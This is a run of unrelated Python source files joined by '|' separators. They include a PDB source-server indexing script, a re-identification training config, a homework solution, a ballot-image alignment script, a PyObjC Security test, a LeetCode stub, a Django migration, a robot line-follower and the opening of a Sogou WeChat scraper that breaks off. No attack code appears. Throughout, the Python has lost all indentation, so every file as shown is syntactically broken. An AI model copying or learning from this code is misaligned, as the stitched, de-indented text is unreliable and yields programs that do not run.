# --under_test - only process an explicit pdb file
if options.under_test:
if options.under_test in exe_pdbs:
lib_pdbs = []
exe_pdbs = [options.under_test]
else:
print(f'Could not find {options.under_test} in directory {root}')
return 3
outcome = 0
vcs_cache = {}
svn_cache = {}
git_cache = {}
vcs_imports = {}
# If anything from options.processed_dir (-p), then take their
# outputs (vcs_cache) and use as imports
if options.processed_dir:
vcs_imports = accumulate_processed(options)
if found_cvdump:
for lib_pdb in lib_pdbs:
print(f'---\nProcessing library {lib_pdb}')
outcome += prepPDB.prep_lib_pdb(lib_pdb,
srcsrv,
found_cvdump,
vcs_cache,
vcs_imports,
svn_cache,
git_cache,
options)
for exe_pdb in exe_pdbs:
print(f'---\nProcessing executable {exe_pdb}')
outcome += prepPDB.prep_exe_pdb(exe_pdb,
srcsrv,
vcs_cache,
vcs_imports,
svn_cache,
git_cache,
options)
end = time.time()
make_log(srcsrv, cvdump, end - start)
# Store the directories where we found our 'roots'
# This can be used for checking if we have un-committed changes
roots = {}
roots["svn"] = prepPDB.extract_repo_roots(svn_cache)
roots["git"] = prepPDB.extract_repo_roots(git_cache)
repo_file = os.path.join(root, 'repo_roots.json')
simur.store_json_data(repo_file, roots)
cache_file = os.path.join(root, simur.VCS_CACHE_FILE_NAME)
simur.store_json_data(cache_file, vcs_cache)
if debug_level > 4:
svn_file = os.path.join(root, 'svn_cache.json')
simur.store_json_data(svn_file, svn_cache)
git_file = os.path.join(root, 'git_cache.json')
simur.store_json_data(git_file, git_cache)
return outcome
#-------------------------------------------------------------------------------
#
#-------------------------------------------------------------------------------
if __name__ == "__main__":
sys.exit(main())
|
# -*- coding: utf-8 -*-
# @Author: solicucu
from yacs.config import CfgNode as CN
_C = CN()
#------------------------------
# MODEL
# config for model paramter
#------------------------------
_C.MODEL = CN()
# using gpu or cpu for the traing
_C.MODEL.DEVICE = 'cpu'
# specify the gpu to be used if use gpu
_C.MODEL.DEVICE_IDS = '0'
# name of the backbone
_C.MODEL.NAME = 'cdnet'
# load the specified checkpoint for the model, self pretrained
_C.MODEL.PRETRAIN_PATH = ''
# load the imagenet checkpoint which we trained
_C.MODEL.IMAGENET_CKPT = ''
# whether separate the feature use for triplet loss and softmax loss
_C.MODEL.USE_BNNECK = False
# whether use DataParallel
_C.MODEL.PARALLEL = False
# for scaling the model width x1 x2 x1.5
_C.MODEL.WIDTH_MULT = 1.
# specify the num of cell in each stage
_C.MODEL.STAGES = [2, 2, 2, 2]
# specify the channel in ecch stage
_C.MODEL.PLANES = [32, 64, 128, 256]
# model genotype path for CDNet/CNet
_C.MODEL.GENOTYPE = 'best_genotype.json'
# neck types
_C.MODEL.NECK_TYPE = "stdneck"
# whether use adaption fusion
_C.MODEL.ADAPTION_FUSION = False
# dim list for construct fc before classify
_C.MODEL.FC_DIMS = []
#--------------------------------
# DATA
# preprocess the data
#--------------------------------
_C.DATA = CN()
# which dataset to be use for training
_C.DATA.DATASET = "market1501"
# path to dataset
_C.DATA.DATASET_DIR = "D:/project/data/"
# _C.DATA.DATASET_DIR = "/home/share/solicucu/data/"
# size of the image during the training
_C.DATA.IMAGE_SIZE = [256,128]
# the probobility for random image horizontal flip
_C.DATA.HF_PROB = 0.5
# the probobility for random image erasing
_C.DATA.RE_PROB = 0.5
# rgb means used for image normalization
_C.DATA.MEAN = [0.485, 0.456, 0.406]
# rgb stds used for image normalization
_C.DATA.STD = [0.229, 0.224, 0.225]
# value of padding size
_C.DATA.PADDING = 10
# cutout # infer cutout=16
_C.DATA.CUTOUT = 0
#--------------------------------
# DATALOADER
#--------------------------------
_C.DATALOADER = CN()
# number of data loading threads
_C.DATALOADER.NUM_WORKERS = 4
# types of Sampler for data loading
_C.DATALOADER.SAMPLER = 'triplet'
# number of instance for single person
_C.DATALOADER.NUM_INSTANCE = 4
#--------------------------------
# SOLVER
#--------------------------------
_C.SOLVER = CN()
# total number of epoch for training
_C.SOLVER.MAX_EPOCHS = 120
# number of images per batch
_C.SOLVER.BATCH_SIZE = 64
# learning rate
# the initial learning
_C.SOLVER.BASE_LR = 0.025
# the period for lerning decay for StepLR
_C.SOLVER.LR_DECAY_PERIOD = 10
# learning rate decay fator
_C.SOLVER.LR_DECAY_FACTOR = 0.1
# lr scheduler [StepLR, ConsineAnnealingLR, WarmupMultiStepLR]
_C.SOLVER.LR_SCHEDULER_NAME = "StepLR"
# min_lr for ConsineAnnealingLR
_C.SOLVER.LR_MIN = 0.001
# for warmupMultiStepLR
# at which epoch change the lr
_C.SOLVER.MILESTONES = [40, 70]
# lr list for multistep
_C.SOLVER.LR_LIST = [3.5e-4, 3.5e-5, 3.5e-6]
# coefficient for linear warmup
_C.SOLVER.GAMA = 0.
# use to calculate the start lr, init_lr = base_lr * warmup_factor
_C.SOLVER.WARMUP_FACTOR = 1.
# how many epoch to warmup, 0 denote do not use warmup
_C.SOLVER.WARMUP_ITERS = 0
# method for warmup
_C.SOLVER.WARMUP_METHOD = 'linear'
# optimizer
# the name of the optimizer
_C.SOLVER.OPTIMIZER_NAME = "SGD"
# momentum for SGD
_C.SOLVER.MOMENTUM = 0.9
# weight decay
_C.SOLVER.WEIGHT_DECAY = 0.0005
# loss
# loss type:softmax, triplet , softmax_triplet
_C.SOLVER.LOSS_NAME = "softmax"
# the margin for triplet loss
_C.SOLVER.TRI_MARGIN = 0.3
# clip the gradient if grad_clip is not zero
_C.SOLVER.GRAD_CLIP = 0.
#--------------------------------
# OUTPUT
#--------------------------------
_C.OUTPUT = CN()
# path to output
_C.OUTPUT.DIRS = "D:/project/data/ReID/ReIDModels/cdnet/market1501/"
# path to save the checkpoint
_C.OUTPUT.CKPT_DIRS = "checkpoints/cdnet_fblneck/"
# specify a name for log
_C.OUTPUT.LOG_NAME = "log_cdnet_fblneck.txt"
# the period for log
_C.OUTPUT.LOG_PERIOD = 10
# the period for saving the checkpoint
_C.OUTPUT.CKPT_PERIOD = 10
# the period for validatio
_C.OUTPUT.EVAL_PERIOD = 10
#--------------------------------
# TRICKS
# set some tricks here
#--------------------------------
# tircks
_C.TRICKS = CN()
# use the label smooth to prevent overfiting
_C.TRICKS.LABEL_SMOOTH = False
# specify the dropout probability
_C.TRICKS.DROPOUT = 0.
#--------------------------------
# TEST
#--------------------------------
_C.TEST = CN()
# batch size for test
_C.TEST.IMGS_PER_BATCH = 128
# whether feature is normalized before test
_C.TEST.FEAT_NORM = 'yes'
# the name of best checkpoint for test
_C.TEST.BEST_CKPT = ''
|
# Written by Chuguan Tian for COMP9021
# Insert your code here
import sys
from collections import defaultdict
import copy
file_name = input('Which data file do you want to use?')
try:
data_file = open(file_name)
data = data_file.readlines()
if data == []:
raise ValueError
sys.exit()
except IOError:
print('Incorrect input!')
sys.exit()
except ValueError:
print('Incorrect input, giving up!')
sys.exit()
data_file.close()
##print('data',data)
#read data
path = []
for i in data:
path.append((i.replace('R','').replace('(','').replace(',',' ').replace(')','')).split())
##print('path',path)
for i in path:
for j in range(len(i)):
i[j] = int(i[j])
##print('path',path)
#get the number linked to each point
##path_each_point = defaultdict(list)
##for i in path:
## path_each_point[i[1]].append(i[0])
##print('path_each_point',path_each_point)
##for i in path_each_point.keys():
## print('i',i)
## for j in path_each_point.keys():
## print('j',j)
## for k in range(len(j)):
## if i == path_each_point[j][k]:
## path_each_point[i].append
## print(path_each_point[i][-1])
def path_f(M,L,P,count):
## print('count',count)
if P == []:
P.append(M)
for i in path:
## print('\ni',i)
if M[1] == i[0]:
P.append(i)
## print('P',P)
return path_f(P[-1],L,P,count)
if count > len(L)-len(P)-1:
return P
else:
continue
if len(P) == 1:
return P
else:
## flg = copy.deepcopy(P[-1])
## print('P[-1]',P[-1])
## P_cp = copy.deepcopy(P[-1])
return path_f(P[-1],L,P,count+1)
path_each_point = []
for i in path:
sub_path = []
count = 0
path_f(i,path,sub_path,count)
path_each_point.append(sub_path)
## print('sub_path',sub_path)
##print('path_each_point',path_each_point)
##path_cp = copy.deepcopy(path)
##path_list = []
##for i in path:
## sub_path = []
## sub_path.append(i)
## print('\ni',i)
## for j in path:
## print('j',j)
## if i == j:
## continue
## elif i[1] == j[0]:
## sub_path.append(j)
## else:
## continue
## print('sub_path',sub_path)
## path_list.append(sub_path)
##print('path_list',path_list)
#sort the path
path_each_point_cp = copy.deepcopy(path_each_point)
length = 0
for i in range(len(path_each_point)):
if len(path_each_point[i]) > length:
length = len(path_each_point[i])
longest_path = path_each_point[i]
##print('longest_path',longest_path)
longest_set = {-1}
#longest_path set
for i in longest_path:
longest_set.add(i[0])
longest_set.add(i[1])
##print('longest_set',longest_set)
for i in range(len(path_each_point_cp)):
## print('i',i)
if path_each_point_cp[i] != longest_path:
for k in path_each_point_cp[i]:
## print('k',k)
if k in longest_path:
path_each_point[i].remove(k)
else:
continue
##print('path_each_point',path_each_point)
for i in range(len(path_each_point_cp)):
## print('i',i)
if path_each_point_cp[i] != longest_path:
for k in path_each_point[i]:
## print('k',k)
if k != [] and longest_path[-1][-1] == k[-1]:
path_each_point[i].remove(k)
else:
continue
##print('path_each_point',path_each_point)
for i in range(len(path_each_point_cp)):
if path_each_point_cp[i] != longest_path:
for k in path_each_point[i]:
if k[0] in longest_set and k[-1] in longest_set:
path_each_point[i].remove(k)
else:
continue
##print('path_each_point',path_each_point)
for i in range(len(path_each_point_cp)):
if [] in path_each_point:
path_each_point.remove([])
##print('path_each_point',path_each_point)
#print the path
path_print_list = []
for i in path_each_point:
for j in i:
path_print_list.append(j)
##print('path_print_list',path_print_list)
path_print_list_sorted = []
for i in path:
if i in path_print_list:
path_print_list_sorted.append(i)
##print('path_print_list_sorted',path_print_list_sorted)
#transfer to print
print('The nonredundant facts are:')
for i in path_print_list_sorted:
t = str(i).replace('[','').replace(']','').replace(' ','')
print(f'R({t})')
|
from scipy import misc,ndimage
from shared import *
from imagesAlign import *
import csv
import os
import string
import sys
def maskImage(I,csvFile):
''' Set regions arounds targets to be NANs '''
Iout=np.copy(I);
bdReader=csv.reader(open(csvFile,'r'))
isFirst=True; pFac=.1;
# loop over every target location
for row in bdReader:
if isFirst:
isFirst=False;
continue
isContest=string.atoi(row[7]);
if isContest==1:
continue
x1=string.atoi(row[2]); x2=x1+string.atoi(row[4]);
y1=string.atoi(row[3]); y2=y1+string.atoi(row[5]);
# expand region around target
(rOut,rOff)=expand(y1,y2,x1,x2,I.shape[0],Iout.shape[1],pFac)
Iout[rOut[0]:rOut[1],rOut[2]:rOut[3]]=np.nan;
return Iout;
def extractTargets(I,Iref,csvFile):
''' Perform local alignment around each target, then crop out target '''
bdReader=csv.reader(open(csvFile,'r'))
IrefM=maskImage(Iref,csvFile);
result = []
isFirst=True; pFac=2;
# loop over every target location
for row in bdReader:
if isFirst:
isFirst=False;
continue
isContest=string.atoi(row[7]);
if isContest==1:
continue
x1=string.atoi(row[2]); x2=x1+string.atoi(row[4]);
y1=string.atoi(row[3]); y2=y1+string.atoi(row[5]);
# expand region around target
(rOut,rOff)=expand(y1,y2,x1,x2,I.shape[0],I.shape[1],pFac)
I1=I[rOut[0]:rOut[1],rOut[2]:rOut[3]];
Iref1=IrefM[rOut[0]:rOut[1],rOut[2]:rOut[3]];
IO=imagesAlign(I1,Iref1)
targ=IO[1][rOff[0]:rOff[1],rOff[2]:rOff[3]];
result.append(targ)
return result
def convertImages(csvP, IrefP, ballotD):
Iref=misc.imread(IrefP,flatten=1)/255.;
for root,dirs,files in os.walk(ballotD):
for f1 in files:
if not(f1.endswith('jpg')):
continue
# 1. check if ballot is flipped
I=misc.imread(os.path.join(root,f1),flatten=1)/255.0;
rszFac=.25
# rotate image
IR=ndimage.interpolation.rotate(I,180)
(H,Io,err)=imagesAlign(I,Iref,rszFac=rszFac,verbose=False)
(HR,IoR,errR)=imagesAlign(IR,Iref,rszFac=rszFac,verbose=False)
if err>errR:
#print f1,' is rotated. diff = ', np.abs(err-errR);
Iin=IR
else:
#print f1,' is NOT rotated. diff = ', np.abs(err-errR);
Iin=I
#imshow(STACK,cmap='gray');
#savefig(os.path.join(root,f1+'.pdf'))
return extractTargets(Iin,Iref,csvP)
if __name__ == "__main__":
if len(sys.argv) != 4:
print 'Bad input. Example: python pressGo.py targets.csv blank.jpg ballotD'
sys.exit()
csvP=sys.argv[1]
IrefP=sys.argv[2]
ballotD=sys.argv[3]
Iref=misc.imread(IrefP,flatten=1)/255.;
for root,dirs,files in os.walk(ballotD):
for f1 in files:
if not(f1.endswith('jpg')):
continue
# 1. check if ballot is flipped
I=misc.imread(os.path.join(root,f1),flatten=1)/255.0;
rszFac=.25
# rotate image
IR=ndimage.interpolation.rotate(I,180)
(H,Io,err)=imagesAlign(I,Iref,rszFac=rszFac,verbose=False)
(HR,IoR,errR)=imagesAlign(IR,Iref,rszFac=rszFac,verbose=False)
if err>errR:
print f1,' is rotated. diff = ', np.abs(err-errR);
Iin=IR
else:
print f1,' is NOT rotated. diff = ', np.abs(err-errR);
Iin=I
STACK=extractTargets(Iin,Iref,csvP)
imshow(STACK,cmap='gray');
savefig(os.path.join(root,f1+'.pdf'))
|
import Security
from PyObjCTools.TestSupport import TestCase
class Testoidsalg(TestCase):
def test_unsuppported(self):
self.assertFalse(hasattr(Security, "CSSMOID_MD2"))
self.assertFalse(hasattr(Security, "CSSMOID_MD4"))
self.assertFalse(hasattr(Security, "CSSMOID_MD5"))
self.assertFalse(hasattr(Security, "CSSMOID_RSA"))
self.assertFalse(hasattr(Security, "CSSMOID_MD2WithRSA"))
self.assertFalse(hasattr(Security, "CSSMOID_MD4WithRSA"))
self.assertFalse(hasattr(Security, "CSSMOID_MD5WithRSA"))
self.assertFalse(hasattr(Security, "CSSMOID_SHA1WithRSA"))
self.assertFalse(hasattr(Security, "CSSMOID_SHA224WithRSA"))
self.assertFalse(hasattr(Security, "CSSMOID_SHA256WithRSA"))
self.assertFalse(hasattr(Security, "CSSMOID_SHA384WithRSA"))
self.assertFalse(hasattr(Security, "CSSMOID_SHA512WithRSA"))
self.assertFalse(hasattr(Security, "CSSMOID_SHA1WithRSA_OIW"))
self.assertFalse(hasattr(Security, "CSSMOID_RSAWithOAEP"))
self.assertFalse(hasattr(Security, "CSSMOID_OAEP_MGF1"))
self.assertFalse(hasattr(Security, "CSSMOID_OAEP_ID_PSPECIFIED"))
self.assertFalse(hasattr(Security, "CSSMOID_DES_CBC"))
self.assertFalse(hasattr(Security, "CSSMOID_ANSI_DH_PUB_NUMBER"))
self.assertFalse(hasattr(Security, "CSSMOID_ANSI_DH_STATIC"))
self.assertFalse(hasattr(Security, "CSSMOID_ANSI_DH_ONE_FLOW"))
self.assertFalse(hasattr(Security, "CSSMOID_ANSI_DH_EPHEM"))
self.assertFalse(hasattr(Security, "CSSMOID_ANSI_DH_HYBRID1"))
self.assertFalse(hasattr(Security, "CSSMOID_ANSI_DH_HYBRID2"))
self.assertFalse(hasattr(Security, "CSSMOID_ANSI_DH_HYBRID_ONEFLOW"))
self.assertFalse(hasattr(Security, "CSSMOID_ANSI_MQV1"))
self.assertFalse(hasattr(Security, "CSSMOID_ANSI_MQV2"))
self.assertFalse(hasattr(Security, "CSSMOID_ANSI_DH_STATIC_SHA1"))
self.assertFalse(hasattr(Security, "CSSMOID_ANSI_DH_ONE_FLOW_SHA1"))
self.assertFalse(hasattr(Security, "CSSMOID_ANSI_DH_EPHEM_SHA1"))
self.assertFalse(hasattr(Security, "CSSMOID_ANSI_DH_HYBRID1_SHA1"))
self.assertFalse(hasattr(Security, "CSSMOID_ANSI_DH_HYBRID2_SHA1"))
self.assertFalse(hasattr(Security, "CSSMOID_ANSI_MQV1_SHA1"))
self.assertFalse(hasattr(Security, "CSSMOID_ANSI_MQV2_SHA1"))
self.assertFalse(hasattr(Security, "CSSMOID_PKCS3"))
self.assertFalse(hasattr(Security, "CSSMOID_DH"))
self.assertFalse(hasattr(Security, "CSSMOID_DSA // BSAFE only"))
self.assertFalse(hasattr(Security, "CSSMOID_DSA_CMS // X509/CMS"))
self.assertFalse(hasattr(Security, "CSSMOID_DSA_JDK // JDK 1.1"))
self.assertFalse(hasattr(Security, "CSSMOID_SHA1WithDSA // BSAFE"))
self.assertFalse(hasattr(Security, "CSSMOID_SHA1WithDSA_CMS // X509/CMS"))
self.assertFalse(hasattr(Security, "CSSMOID_SHA1WithDSA_JDK // JDK 1.1"))
self.assertFalse(hasattr(Security, "CSSMOID_SHA1"))
self.assertFalse(hasattr(Security, "CSSMOID_SHA224"))
self.assertFalse(hasattr(Security, "CSSMOID_SHA256"))
self.assertFalse(hasattr(Security, "CSSMOID_SHA384"))
self.assertFalse(hasattr(Security, "CSSMOID_SHA512"))
self.assertFalse(hasattr(Security, "CSSMOID_ecPublicKey"))
self.assertFalse(hasattr(Security, "CSSMOID_ECDSA_WithSHA1"))
self.assertFalse(hasattr(Security, "CSSMOID_ECDSA_WithSHA224"))
self.assertFalse(hasattr(Security, "CSSMOID_ECDSA_WithSHA256"))
self.assertFalse(hasattr(Security, "CSSMOID_ECDSA_WithSHA384"))
self.assertFalse(hasattr(Security, "CSSMOID_ECDSA_WithSHA512"))
self.assertFalse(hasattr(Security, "CSSMOID_ECDSA_WithSpecified"))
self.assertFalse(hasattr(Security, "CSSMOID_APPLE_ISIGN"))
self.assertFalse(hasattr(Security, "CSSMOID_APPLE_X509_BASIC"))
self.assertFalse(hasattr(Security, "CSSMOID_APPLE_TP_SSL"))
self.assertFalse(hasattr(Security, "CSSMOID_APPLE_TP_LOCAL_CERT_GEN"))
self.assertFalse(hasattr(Security, "CSSMOID_APPLE_TP_CSR_GEN"))
self.assertFalse(hasattr(Security, "CSSMOID_APPLE_TP_REVOCATION_CRL"))
self.assertFalse(hasattr(Security, "CSSMOID_APPLE_TP_REVOCATION_OCSP"))
self.assertFalse(hasattr(Security, "CSSMOID_APPLE_TP_SMIME"))
self.assertFalse(hasattr(Security, "CSSMOID_APPLE_TP_EAP"))
self.assertFalse(hasattr(Security, "CSSMOID_APPLE_TP_CODE_SIGN"))
self.assertFalse(hasattr(Security, "CSSMOID_APPLE_TP_SW_UPDATE_SIGNING"))
self.assertFalse(hasattr(Security, "CSSMOID_APPLE_TP_IP_SEC"))
self.assertFalse(hasattr(Security, "CSSMOID_APPLE_TP_ICHAT"))
self.assertFalse(hasattr(Security, "CSSMOID_APPLE_TP_RESOURCE_SIGN"))
self.assertFalse(hasattr(Security, "CSSMOID_APPLE_TP_PKINIT_CLIENT"))
self.assertFalse(hasattr(Security, "CSSMOID_APPLE_TP_PKINIT_SERVER"))
self.assertFalse(hasattr(Security, "CSSMOID_APPLE_TP_CODE_SIGNING"))
self.assertFalse(hasattr(Security, "CSSMOID_APPLE_TP_PACKAGE_SIGNING"))
self.assertFalse(hasattr(Security, "CSSMOID_APPLE_TP_MACAPPSTORE_RECEIPT"))
self.assertFalse(hasattr(Security, "CSSMOID_APPLE_TP_APPLEID_SHARING"))
self.assertFalse(hasattr(Security, "CSSMOID_APPLE_TP_TIMESTAMPING"))
self.assertFalse(hasattr(Security, "CSSMOID_APPLE_TP_REVOCATION"))
self.assertFalse(hasattr(Security, "CSSMOID_APPLE_TP_PASSBOOK_SIGNING"))
self.assertFalse(hasattr(Security, "CSSMOID_APPLE_TP_MOBILE_STORE"))
self.assertFalse(hasattr(Security, "CSSMOID_APPLE_TP_ESCROW_SERVICE"))
self.assertFalse(hasattr(Security, "CSSMOID_APPLE_TP_PROFILE_SIGNING"))
self.assertFalse(hasattr(Security, "CSSMOID_APPLE_TP_QA_PROFILE_SIGNING"))
self.assertFalse(hasattr(Security, "CSSMOID_APPLE_TP_TEST_MOBILE_STORE"))
self.assertFalse(hasattr(Security, "CSSMOID_APPLE_TP_PCS_ESCROW_SERVICE"))
self.assertFalse(
hasattr(Security, "CSSMOID_APPLE_TP_PROVISIONING_PROFILE_SIGNING")
)
self.assertFalse(hasattr(Security, "CSSMOID_APPLE_FEE"))
self.assertFalse(hasattr(Security, "CSSMOID_APPLE_ASC"))
self.assertFalse(hasattr(Security, "CSSMOID_APPLE_FEE_MD5"))
self.assertFalse(hasattr(Security, "CSSMOID_APPLE_FEE_SHA1"))
self.assertFalse(hasattr(Security, "CSSMOID_APPLE_FEED"))
self.assertFalse(hasattr(Security, "CSSMOID_APPLE_FEEDEXP"))
self.assertFalse(hasattr(Security, "CSSMOID_APPLE_ECDSA"))
self.assertFalse(hasattr(Security, "CSSMOID_DOTMAC_CERT"))
self.assertFalse(hasattr(Security, "CSSMOID_DOTMAC_CERT_REQ"))
self.assertFalse(hasattr(Security, "CSSMOID_DOTMAC_CERT_REQ_IDENTITY"))
self.assertFalse(hasattr(Security, "CSSMOID_DOTMAC_CERT_REQ_EMAIL_SIGN"))
self.assertFalse(hasattr(Security, "CSSMOID_DOTMAC_CERT_REQ_EMAIL_ENCRYPT"))
self.assertFalse(hasattr(Security, "CSSMOID_DOTMAC_CERT_REQ_ARCHIVE_LIST"))
self.assertFalse(hasattr(Security, "CSSMOID_DOTMAC_CERT_REQ_ARCHIVE_STORE"))
self.assertFalse(hasattr(Security, "CSSMOID_DOTMAC_CERT_REQ_ARCHIVE_FETCH"))
self.assertFalse(hasattr(Security, "CSSMOID_DOTMAC_CERT_REQ_ARCHIVE_REMOVE"))
self.assertFalse(hasattr(Security, "CSSMOID_DOTMAC_CERT_REQ_SHARED_SERVICES"))
self.assertFalse(hasattr(Security, "CSSMOID_DOTMAC_CERT_REQ_VALUE_USERNAME"))
self.assertFalse(hasattr(Security, "CSSMOID_DOTMAC_CERT_REQ_VALUE_PASSWORD"))
self.assertFalse(hasattr(Security, "CSSMOID_DOTMAC_CERT_REQ_VALUE_HOSTNAME"))
self.assertFalse(hasattr(Security, "CSSMOID_DOTMAC_CERT_REQ_VALUE_RENEW"))
self.assertFalse(hasattr(Security, "CSSMOID_DOTMAC_CERT_REQ_VALUE_ASYNC"))
self.assertFalse(hasattr(Security, "CSSMOID_DOTMAC_CERT_REQ_VALUE_IS_PENDING"))
self.assertFalse(hasattr(Security, "CSSMOID_PKCS5_DIGEST_ALG"))
self.assertFalse(hasattr(Security, "CSSMOID_PKCS5_ENCRYPT_ALG"))
self.assertFalse(hasattr(Security, "CSSMOID_PKCS5_HMAC_SHA1"))
self.assertFalse(hasattr(Security, "CSSMOID_PKCS5_pbeWithMD2AndDES"))
self.assertFalse(hasattr(Security, "CSSMOID_PKCS5_pbeWithMD2AndRC2"))
self.assertFalse(hasattr(Security, "CSSMOID_PKCS5_pbeWithMD5AndDES"))
self.assertFalse(hasattr(Security, "CSSMOID_PKCS5_pbeWithMD5AndRC2"))
self.assertFalse(hasattr(Security, "CSSMOID_PKCS5_pbeWithSHA1AndDES"))
self.assertFalse(hasattr(Security, "CSSMOID_PKCS5_pbeWithSHA1AndRC2"))
self.assertFalse(hasattr(Security, "CSSMOID_PKCS5_PBKDF2"))
self.assertFalse(hasattr(Security, "CSSMOID_PKCS5_PBES2"))
self.assertFalse(hasattr(Security, "CSSMOID_PKCS5_PBMAC1"))
self.assertFalse(hasattr(Security, "CSSMOID_PKCS5_RC2_CBC"))
self.assertFalse(hasattr(Security, "CSSMOID_PKCS5_DES_EDE3_CBC"))
self.assertFalse(hasattr(Security, "CSSMOID_PKCS5_RC5_CBC"))
self.assertFalse(hasattr(Security, "CSSMOID_PKCS12_pbeWithSHAAnd128BitRC4"))
self.assertFalse(hasattr(Security, "CSSMOID_PKCS12_pbeWithSHAAnd40BitRC4"))
self.assertFalse(hasattr(Security, "CSSMOID_PKCS12_pbeWithSHAAnd3Key3DESCBC"))
self.assertFalse(hasattr(Security, "CSSMOID_PKCS12_pbeWithSHAAnd2Key3DESCBC"))
self.assertFalse(hasattr(Security, "CSSMOID_PKCS12_pbeWithSHAAnd128BitRC2CBC"))
self.assertFalse(hasattr(Security, "CSSMOID_PKCS12_pbewithSHAAnd40BitRC2CBC"))
|
'''
5248->1248. Count Number of Nice Subarrays
Difficulty: Medium
Given an array of integers nums and an integer k.
A subarray is called nice if there are k odd numbers on it.
Return the number of nice sub-arrays.
Example 1:
Input: nums = [1,1,2,1,1], k = 3
Output: 2
Explanation: The only sub-arrays with 3 odd numbers are [1,1,2,1] and [1,2,1,1].
Example 2:
Input: nums = [2,4,6], k = 1
Output: 0
Explanation: There is no odd numbers in the array.
Example 3:
Input: nums = [2,2,2,1,2,2,1,2,2,2], k = 2
Output: 16
Constraints:
1 <= nums.length <= 50000
1 <= nums[i] <= 10^5
1 <= k <= nums.length
'''
class Solution(object):
def numberOfSubarrays(self, nums, k):
"""
:type nums: List[int]
:type k: int
:rtype: int
"""
|
# Generated by Django 3.2 on 2021-05-26 17:20
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('school_management_app', '0024_pcomment_pnews'),
]
operations = [
migrations.RenameField(
model_name='leavereportstudent',
old_name='leave_date',
new_name='leave_start_date',
),
migrations.AddField(
model_name='leavereportstudent',
name='leave_end_date',
field=models.CharField(default='', max_length=255),
),
]
|
from aurigapy import *
from time import sleep
from time import gmtime, strftime
BASE_SPEED = 40
BASE_TURN = 30
ap = AurigaPy(debug=False)
bluetooth = "/dev/rfcomm1"
ap.connect(bluetooth)
print("Conectado")
lastSpeedo = 'f'
def custom_speeds(robot, speed_L, speed_R):
# Need to concatenate the hex sequence ff 55 07 00 02 05 <speedleft> <speedright> to the bot's output
# Since the line follower direction control requires of custom speeds for each wheel, it's convenient to directly call
# the _write method with a customized string
# Minor changes to the usual callback generation
rp = Response.generate_response_block(Frame.FRAME_TYPE_ACK, timeout=2)
robot.add_responder(rp)
# Generate hex string based on speeds
data = bytearray([0xff, 0x55, 0x07, 0x00, 0x02, 0x5] +
short2bytes(speed_L) +
short2bytes(speed_R))
# Write the hex string directly to the bot
robot._write(data)
# Wait for callback
rp.wait_blocking()
while(True):
value = ap.get_line_sensor(9)
if(value == 0):
if(lastSpeedo == "fwds"):
custom_speeds(ap,-BASE_SPEED,BASE_SPEED)
elif(lastSpeedo == "bwds"):
custom_speeds(ap,BASE_SPEED,-BASE_SPEED) # Halt: EotL
elif(lastSpeedo == "left"):
custom_speeds(ap,-BASE_SPEED,BASE_SPEED+5) # We "trick" the system into readjusting itself, preventing a possible overcompensation in the turn
elif(lastSpeedo == "rite"):
custom_speeds(ap,-BASE_SPEED+5,BASE_SPEED) # Same as before, but this time favouring a slight left turn instead of a right one
lastSpeedo = "fwds"
elif(value == 1):
if(lastSpeedo == "fwds"):
custom_speeds(ap,-BASE_TURN,-BASE_TURN)
elif(lastSpeedo == "bwds"):
custom_speeds(ap,BASE_SPEED,BASE_TURN)
elif(lastSpeedo == "left"):
custom_speeds(ap,-BASE_SPEED,-BASE_TURN) # Pronounced left turn, speed up slightly
elif(lastSpeedo == "rite"):
custom_speeds(ap,-BASE_SPEED,-BASE_TURN) # Sharp "Z" turn, slow down slightly
lastSpeedo = "left"
elif(value == 2):
if(lastSpeedo == "fwds"):
custom_speeds(ap,BASE_TURN,BASE_SPEED)
elif(lastSpeedo == "bwds"):
custom_speeds(ap,-BASE_TURN,-BASE_SPEED)
elif(lastSpeedo == "left"):
custom_speeds(ap,BASE_TURN,BASE_SPEED) # Sharp "Z" turn, slow down slightly
elif(lastSpeedo == "rite"):
custom_speeds(ap,BASE_TURN,BASE_SPEED) # Pronounced right turn, speed up slightly
lastSpeedo = "rite"
elif(value == 3):
custom_speeds(ap,BASE_SPEED,-BASE_SPEED)
lastSpeedo = "bwds"
# if(lastSpeedo == "fwds"):
# custom_speeds(ap,BASE_SPEED,-BASE_SPEED) # Out of line after forwards action, go backwards
# lastSpeedo = "bwds"
# elif(lastSpeedo == "bwds"):
# custom_speeds(ap,-BASE_SPEED,BASE_SPEED) # OOL after backwards action, go back forwards
# lastSpeedo = "fwds"
# elif(lastSpeedo == "left"):
# custom_speeds(ap,BASE_SPEED,BASE_SPEED) # OOL after left turn, turn right
# lastSpeedo = "rite"
# elif(lastSpeedo == "rite"):
# custom_speeds(ap,-BASE_SPEED,-BASE_SPEED) # OOL after right turn, turn left
# lastSpeedo = "left"
|
import requests
from weixin.config import *
from weixin.db import RedisClient
from pyquery import PyQuery as pq
class Spider():
base_url = 'https://weixin.sogou.com/weixin?query=%s&type=2&page=%s&ie=utf8'
keyword = '宝多六花'
params = {
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
'Accept-Encoding': 'gzip, deflate, br',
'Accept-Language': 'zh-CN,zh;q=0.9',
'Cache-Control': 'max-age=0',
'Connection': 'keep-alive',
'Host': 'weixin.sogou.com',
'Upgrade-Insecure-Requests': '1',
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36',
}
proxies = None
headers = None
redis = RedisClient()
def head(self, snuid):
"""
获取snuid,拼凑出请求头
:param snuid: snuid参数
:return: 请求头
"""
snuid = snuid[1]
print('Cookie使用:', snuid)
